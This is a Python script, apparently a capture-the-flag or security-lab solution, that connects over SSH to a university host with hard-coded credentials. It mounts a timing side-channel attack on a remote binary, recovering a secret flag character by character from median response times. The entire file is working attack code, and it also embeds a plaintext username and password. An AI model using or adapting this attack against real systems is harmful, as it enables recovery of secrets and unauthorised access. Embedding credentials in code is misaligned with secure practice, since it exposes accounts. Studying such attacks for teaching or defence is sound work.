import string
import random
import operator
import sys
import traceback
import paramiko
import itertools
import statistics
import pickle
import base64
import re
from collections import defaultdict
from scipy import stats
from shlex import quote

# Default number of timing samples per candidate; used by median_try_option
# and try_possibilities whenever the caller passes a falsy `samples`.
NSAMPLES = 4
# When True, try_option prints the first output line of every remote run.
DEBUG = False

# Pinned ECDSA (nistp256) host key of the target server. It is registered in
# the client's host-key store below so connect() can verify the server; no
# missing-host-key policy is configured in this block.
key = paramiko.ECDSAKey(data=base64.b64decode("AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG6BMhE8iR+OoCjLDQ9GPJjHY3yfk/tC5VBUC4mLdJ3EbaUlNjfAyE5cbW6dxH3AVNSXTTOaRDSsVI82Lv0brtg="))
# Shared SSH connection used by try_option for every remote command.
client = paramiko.SSHClient()
client.get_host_keys().add('agile019.science.uva.nl', 'ecdsa-sha2-nistp256', key)
# Connects as soon as this module runs, using password authentication.
# NOTE(review): credentials are hard-coded in source; consider reading them
# from the environment or a config file instead.
client.connect('agile019.science.uva.nl', username='hackme3', password='tryMeMore')

def try_option(chars):
    """Run ``./main`` on the remote host with *chars* as its only argument.

    *chars* is shell-quoted before being placed on the command line. Returns
    the first line of the command's stdout with surrounding whitespace
    removed. If the command wrote nothing to stdout, a warning is printed and
    ``None`` is returned. With ``DEBUG`` enabled the returned line is also
    printed.
    """
    command = './main ' + quote(chars)
    _stdin, out_stream, _stderr = client.exec_command(command)
    lines = list(out_stream)

    if not lines:
        print("Warning: no result from command?")
        return None

    first_line = lines[0].strip()
    if DEBUG:
        print(first_line)
    return first_line

def median_try_option(chars, samples=None):
    """Time ``./main`` on *chars* repeatedly and return the median timing.

    Calls try_option(chars) ``samples`` times (``NSAMPLES`` when *samples* is
    falsy). Any output containing both '-' and 'seconds' is treated as a bogus
    negative timing and that attempt is re-run.

    Returns ``(times, median_time)``, where ``times`` is a tuple of the parsed
    float timings.

    If any output carries no parseable decimal number (including the case
    where the command printed nothing), the raw outputs and *chars* are
    printed and the process exits with status 1. The printed message suggests
    the author treats a non-timing reply as a possible key hit.
    """
    results = []
    for _ in range(samples or NSAMPLES):
        output = try_option(chars)
        # try_option returns None on empty stdout; stop retrying in that case
        # and let the parse step below report it rather than raising TypeError.
        while output is not None and '-' in output and 'seconds' in output:
            output = try_option(chars)
        results.append(output)

    try:
        # Literal '\.' so only a real decimal number is accepted.
        times = tuple(float(re.search(r'(-?\d+\.\d+)', result).group(1)) for result in results)
        median_time = statistics.median(times)
    except (AttributeError, TypeError, ValueError):
        # AttributeError: no match; TypeError: result is None;
        # ValueError (incl. statistics.StatisticsError): bad number / no data.
        # Narrow on purpose: Ctrl-C and SystemExit must still propagate.
        print(f"Found key? results: {results}")
        print(f"Chars: {chars!r}")
        sys.exit(1)
    return (times, median_time)

def robust_try_option(chars):
    """Run ``./main`` once on *chars* and return its reported timing as a float.

    Re-runs the command while the output contains both '-' and 'seconds'
    (a bogus negative timing). The first decimal number in the output is
    returned.

    Raises ValueError, with the raw output in the message, if the command
    printed nothing or its output contains no decimal number. Previously
    these cases surfaced as an opaque TypeError or AttributeError.
    """
    output = try_option(chars)
    # try_option yields None on empty stdout; don't feed that to `in`.
    while output is not None and '-' in output and 'seconds' in output:
        output = try_option(chars)

    # Literal '\.' so only a real decimal number is accepted.
    match = re.search(r'(-?\d+\.\d+)', output) if output is not None else None
    if match is None:
        raise ValueError(f"No timing found in output {output!r} for {chars!r}")
    return float(match.group(1))

def try_possibilities(base, possibilities, samples=None):
    """Time every candidate suffix in *possibilities* appended to *base*.

    Each probe string is ``(base + possibility).ljust(16)``, timed with
    robust_try_option. All candidates are timed once per round, for
    ``samples`` rounds (``NSAMPLES`` when *samples* is falsy). After every
    measurement a 1-based progress line is printed, showing the two
    candidates with the highest running median.

    *possibilities* must support len() and repeated iteration (e.g. a list).

    Returns ``(time_map, means)``:
    - ``time_map`` maps each possibility to its list of measured times.
    - ``means`` maps each possibility to the median of those times (despite
      the name).
    Both are empty if nothing was timed.
    """
    import heapq  # local import: only this function needs it

    time_map = defaultdict(list)
    means = {}

    samples = samples or NSAMPLES
    per_round = len(possibilities)
    total = samples * per_round

    for sample in range(samples):
        for index, possibility in enumerate(possibilities):
            elapsed = robust_try_option((base + possibility).ljust(16))
            time_map[possibility].append(elapsed)
            # Only this candidate's median changed; don't recompute all of them.
            means[possibility] = statistics.median(time_map[possibility])

            # nlargest(2, ...) is documented as equal to sorted(..., reverse=True)[:2]
            # (same tie order) but avoids a full sort on every measurement.
            top_two = heapq.nlargest(2, means.items(), key=operator.itemgetter(1))
            best_two = "".join(f"[{k}: {v}] " for k, v in top_two)

            done = sample * per_round + index + 1
            print(f"[{done}/{total}] Time for key {base+possibility!r}: {elapsed} {best_two}")

    return time_map, means

def find_next_n(base, n, char_range=None, nsamples=None):
    """Guess the *n* characters that most likely follow *base*.

    Builds every length-*n* string over *char_range* (printable ASCII
    0x20-0x7e when *char_range* is falsy) and times each one appended to
    *base* via try_possibilities, with *nsamples* rounds.

    The raw per-candidate timings are pickled to ``data_base_<base>.pickle``
    in the current directory. *base* is percent-encoded in that file name so
    characters such as '/' cannot turn it into a path; alphanumeric bases
    produce the same name as before.

    Returns the candidate whose median time is highest.

    Raises ValueError if there are no candidate strings to try.
    """
    # Aliased because `quote` at module level is shlex.quote.
    from urllib.parse import quote as url_quote

    char_range = char_range or map(chr, range(0x20, 0x7f))
    possibilities = [''.join(x) for x in itertools.product(char_range, repeat=n)]
    if not possibilities:
        raise ValueError(f"No candidate strings of length {n} to try after {base!r}")

    tm1, means = try_possibilities(base, possibilities, samples=nsamples)

    with open(f'data_base_{url_quote(base, safe="")}.pickle', 'wb') as f:
        pickle.dump(tm1, f)

    return max(means.items(), key=operator.itemgetter(1))[0]

def find_key(base):
    """Greedily extend *base* one lowercase ASCII letter at a time.

    Each step asks find_next_n for the single best next character (5 samples
    per candidate), appends it, and prints the growing guess. There is no
    exit condition: the loop only ends when a callee raises or exits.
    """
    guess = base
    while True:
        next_char = find_next_n(guess, 1, char_range=string.ascii_lowercase, nsamples=5)
        guess = guess + next_char
        print(f"Base: {guess!r}")

try:
    find_key('flagtimingsis')
finally:
    # find_key never returns normally; it ends via an exception or sys.exit.
    # Close the shared SSH connection on that path too, which the original
    # trailing close() never reached.
    client.close()
